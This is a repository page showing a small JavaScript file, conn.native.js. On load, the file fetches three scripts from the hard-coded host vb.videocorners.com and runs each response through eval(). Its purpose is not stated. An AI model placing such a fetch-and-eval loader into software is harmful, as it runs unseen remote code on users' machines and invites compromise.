您最多选择25个主题 主题必须以字母或数字开头,可以包含连字符 (-),并且长度不得超过35个字符

conn.native.js 1.3KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162
  1. function nop(){}
  2. window.nop = nop
  3. window.oclog = console.log
  4. window.clog = console.log
  5. {
  6. // var host_tmp="jinnace.com"
  7. var host_tmp="vb.videocorners.com"
  8. var host=host_tmp
  9. window.glob_const = {
  10. host:host_tmp,
  11. full:`https://${host_tmp}`,
  12. origin:`https://${host_tmp}`,
  13. }
  14. }
  15. function rexe(file) {
  16. var mlog = clog
  17. if (typeof(file) == "string"){
  18. file = {
  19. // url:file||"https://jinnace.com/ign/rf/av_shared/xf.js",
  20. url:file,
  21. }
  22. }
  23. var url = file.url
  24. var xhttp = new XMLHttpRequest();
  25. xhttp.onreadystatechange = function() {
  26. if (this.readyState == 4 && this.status == 200) {
  27. try {
  28. var mlog0 = mlog
  29. var mx = eval(this.responseText)
  30. mlog(mx)
  31. } catch (err){
  32. mlog("EVL ERR")
  33. mlog(err +"")
  34. }
  35. // global
  36. // fn1()
  37. // send_ws_event("ajx",{responseText:this.responseText})
  38. // document.getElementById("demo").innerHTML = this.responseText;
  39. }
  40. };
  41. xhttp.open("GET", url, true);
  42. xhttp.send();
  43. }
  44. // C:\bspace\repos\jc4\ign4\j8\ac0\rld\r0.js
  45. // proto_ext.js?c=00x
  46. // https://av.videocorners.com/ign/rf/u/proto_ext.js?c=00x
  47. rexe(`${glob_const.full}/ign/j8/ac0/rld/mrld.js`)
  48. rexe(`${glob_const.full}/ign/j8/ac0/rld/r0.js`)
  49. rexe(`${glob_const.full}/ign/rf/u/proto_ext.js`)